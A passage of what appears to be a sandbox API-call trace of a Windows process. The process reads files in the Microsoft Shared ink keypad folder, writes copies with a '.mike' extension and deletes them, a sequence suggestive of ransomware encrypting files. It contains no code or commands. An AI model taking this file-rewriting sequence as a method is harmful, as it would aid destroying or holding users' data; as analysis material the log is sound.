lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x2157ed4 | out: lpFileInformation=0x2157ed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0045.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x2158234 | out: lpFileInformation=0x2158234*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0045.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.639] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.639] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.639] GetFileType (hFile=0x264) returned 0x1 [0045.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.639] GetFileType (hFile=0x264) returned 0x1 [0045.639] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.639] WriteFile (in: hFile=0x264, lpBuffer=0x215926c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x215926c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.640] CloseHandle (hObject=0x264) returned 1 [0045.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.640] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x2158d0c | out: lpFileInformation=0x2158d0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e)) returned 1 [0045.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.641] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.641] GetFileType (hFile=0x264) returned 0x1 [0045.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.641] GetFileType (hFile=0x264) returned 0x1 [0045.641] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.641] ReadFile (in: hFile=0x264, lpBuffer=0x215a3bc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x215a3bc*, lpNumberOfBytesRead=0x2af038*=0x45e, lpOverlapped=0x0) returned 1 [0045.656] CloseHandle (hObject=0x264) returned 1 [0045.656] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.656] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.656] GetFileType (hFile=0x264) returned 0x1 [0045.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.657] GetFileType (hFile=0x264) returned 0x1 [0045.657] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.657] WriteFile (in: hFile=0x264, lpBuffer=0x215ecb0*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x215ecb0*, lpNumberOfBytesWritten=0x2af02c*=0x460, lpOverlapped=0x0) returned 1 [0045.657] CloseHandle (hObject=0x264) returned 1 [0045.658] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.658] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.658] GetFileType (hFile=0x264) returned 0x1 [0045.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.658] GetFileType (hFile=0x264) returned 0x1 [0045.659] WriteFile (in: hFile=0x264, lpBuffer=0x2161efc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2161efc*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.659] CloseHandle (hObject=0x264) returned 1 [0045.659] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.660] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56835e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56835e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56a9740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0045.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.660] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x216375c | out: lpFileInformation=0x216375c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56835e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56835e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56a9740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0045.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.660] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", dwFileAttributes=0x80) returned 0 [0045.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.661] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe56835e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe56835e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe56a9740, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x680)) returned 1 [0045.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.661] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpFilePart=0x0) returned 0x56 [0045.662] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike", lpFilePart=0x0) returned 0x5b [0045.662] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml.mike")) returned 1 [0045.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.663] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.664] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.664] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.664] GetFileType (hFile=0x264) returned 0x1 [0045.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.665] GetFileType (hFile=0x264) returned 0x1 [0045.665] CloseHandle (hObject=0x264) returned 1 [0045.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.665] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.665] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.665] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x2165a10 | out: lpFileInformation=0x2165a10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188)) returned 1 [0045.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.665] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), fInfoLevelId=0x0, lpFileInformation=0x2165d58 | out: lpFileInformation=0x2165d58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188)) returned 1 [0045.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.665] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpFilePart=0x0) returned 0x53 [0045.666] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike", lpFilePart=0x0) returned 0x58 [0045.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.666] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.666] 